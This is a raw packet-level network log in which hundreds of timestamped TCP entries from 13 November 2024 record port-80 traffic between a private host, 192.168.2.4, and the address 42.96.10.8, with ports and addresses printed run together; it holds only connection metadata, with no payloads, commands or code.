                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291829109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291838884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291852951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291876078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291955948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291966915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291975975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291985989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.292006016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.292020082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323422909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323467970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323477983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323502064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323533058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323543072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323554039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323563099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323573112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323575020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323607922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323616982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323621035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323632002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323651075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323765993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323776007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323786974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323796988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323807001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323808908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323827028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323836088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323839903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323848963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323852062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.323874950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330276966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330286980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330297947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330317974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330347061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330359936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330370903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330382109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330391884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330403090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330404043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330427885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330481052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330492973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330502987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330529928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.330543041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.350141048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.350153923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.350166082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.350214005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.350220919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.350233078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.350239038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.350244999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.350255013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.350287914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.350312948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353456974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353468895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353480101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353499889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353507996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353511095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353523970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353538036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353544950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353578091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353610992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353636026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353648901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353652000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353662968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353676081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353682041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353709936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353714943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353720903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353733063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353744984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353755951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353755951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353815079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353847980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353859901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353873014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353904009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353936911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353950024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353961945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353972912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.353991985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354013920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354026079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354037046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354048967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354060888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354072094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354074955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354091883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354129076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354141951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354154110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354177952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354191065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354363918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354373932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354413033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354473114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354484081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354505062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354516029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354516029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354566097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354598045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354609013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354619980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354630947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354643106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354654074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354671001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354700089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354713917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354726076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354757071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354758978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354770899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354783058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354796886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354820013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354841948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354876995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354890108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354902029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354914904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354926109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354928017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354955912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.354986906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355000019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355010986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355022907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355021954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355036020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355046988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355051994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355077982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355088949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355113983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355124950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355129004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355163097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355175018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355189085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355201960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355214119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355225086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355243921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355355024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355448961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355501890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355528116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355564117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355576038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355586052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.355619907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356437922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356447935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356457949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356492996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356591940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356602907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356611967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356621027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356630087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356631041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356648922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356663942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356690884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356702089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356710911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356719971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356729031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356734991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356739044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356758118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356772900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356879950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356890917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356899023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356908083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356915951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356919050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356926918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356935978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356939077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356950045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356961966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356966972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356971979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.356978893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357011080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357039928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357049942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357058048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357068062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357076883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357085943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357086897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357096910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357100964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357129097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357193947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357203960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357213020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357222080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357232094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357235909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357243061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357247114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357253075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357263088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357275963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357287884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357310057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357317924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357362032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357486963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357496977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357506037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357532978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357534885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357538939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357548952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357556105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357568026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357578039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357587099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357592106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357597113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357603073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357611895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357624054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357652903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357656002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357656002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357661963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357671976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357682943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357688904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357688904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357688904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357693911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357703924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357717991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357722044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357723951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357737064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357779026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357789040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357794046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357805967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357815027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357824087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357830048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357835054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357839108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357851028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357857943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.357892036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358015060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358031988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358042002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358048916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358055115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358056068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358064890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358076096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358084917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358088017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.358093977 CET804973342.96.10.8192.168.2.4
